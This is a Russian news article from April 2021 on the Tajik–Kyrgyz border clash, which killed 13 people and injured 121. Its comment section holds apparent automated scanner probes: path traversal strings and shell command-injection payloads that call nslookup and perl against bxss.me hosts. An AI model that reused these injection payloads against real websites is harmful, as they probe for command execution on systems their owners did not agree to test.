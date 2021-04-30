Число жертв конфликта на границе Таджикистана и Киргизии выросло до 13

Больше 120 человек пострадали

Число погибших во время конфликта на таджикско-киргизской границе увеличилось до 13. Об этом рассказали в Министерстве здравоохранения одной из стран.

Пострадали 121 человек, из них 25 спецбортом отправили в Бишкек. Их разместили в НИЦ травматологии и ортопедии, Национальном госпитале и Национальном хирургическом центре.

Двое раненых находятся в тяжелом состоянии. Остальные, по словам врачей, пребывают в состоянии средней тяжести и более-менее удовлетворительном, рассказали РИА "Новости" в Минздраве Таджикистана.

Противостояние на границе двух постсоветских республик возникло в четверг, 29 апреля, из-за спора о водораспределительном пункте. В какой-то момент там даже появилась военная техника и началась перестрелка, затем к рубежу двинулись бронетранспортеры с танками.

Спустя время главы МИД Киргизии и Таджикистана договорились прекратить вооруженное противостояние. И решили увести своих военных на места их дислокации, напоминает "Свободная пресса".

Полина ДОРОЖКИНА

Ответить:

Гость221196
Пожаловаться Ответить
./555
Гость221196
Пожаловаться Ответить
555
Гость221196
Пожаловаться Ответить
555
Гость221196
Пожаловаться Ответить
../555
Гость221196
Пожаловаться Ответить
555
Гость221196
Пожаловаться Ответить
555
Гость221196
Пожаловаться Ответить
555
;(nslookup hitdvcrjdwmal5c0fa.bxss.me||perl -e "gethostbyname('hitdvcrjdwmal5c0fa.bxss.me')")|(nslookup hitdvcrjdwmal5c0fa.bxss.me||perl -e "gethostbyname('hitdvcrjdwmal5c0fa.bxss.me')")&(nslookup hitdvcrjdwmal5c0fa.bxss.me||perl -e "gethostbyname('hitdvcrjdwmal5c0fa.bxss.me')")
Пожаловаться Ответить
555
Гость221196
Пожаловаться Ответить
e5s5lDHl
&(nslookup hitmdjnmtxxre50b1d.bxss.me||perl -e "gethostbyname('hitmdjnmtxxre50b1d.bxss.me')")&'\"`0&(nslookup hitmdjnmtxxre50b1d.bxss.me||perl -e "gethostbyname('hitmdjnmtxxre50b1d.bxss.me')")&`'
Пожаловаться Ответить
555
1 2 3 4 12 Следующая
новости партнеров

"Россия не будет терпеть": в Кремле жестко ответили на действия Чехии

То, что сейчас творят чехи, не останется без последствий

Изменения с 1 мая: россиян ждут хорошие и плохие новости

Перемены затронут разные сферы жизни

Выбор редакции

Новости партнеров

Самое читаемое

Загрузка...

Рекомендуем

Новости Украины

Все новости раздела

Шоу-бизнес

Все новости раздела

Армия

Все новости раздела

Политика

Все новости раздела

Жизнь

Все новости раздела

Инопланетяне

Все новости раздела

Происшествия

Все новости раздела

Выбор читателей

Персоны на сайте

Выбор читателей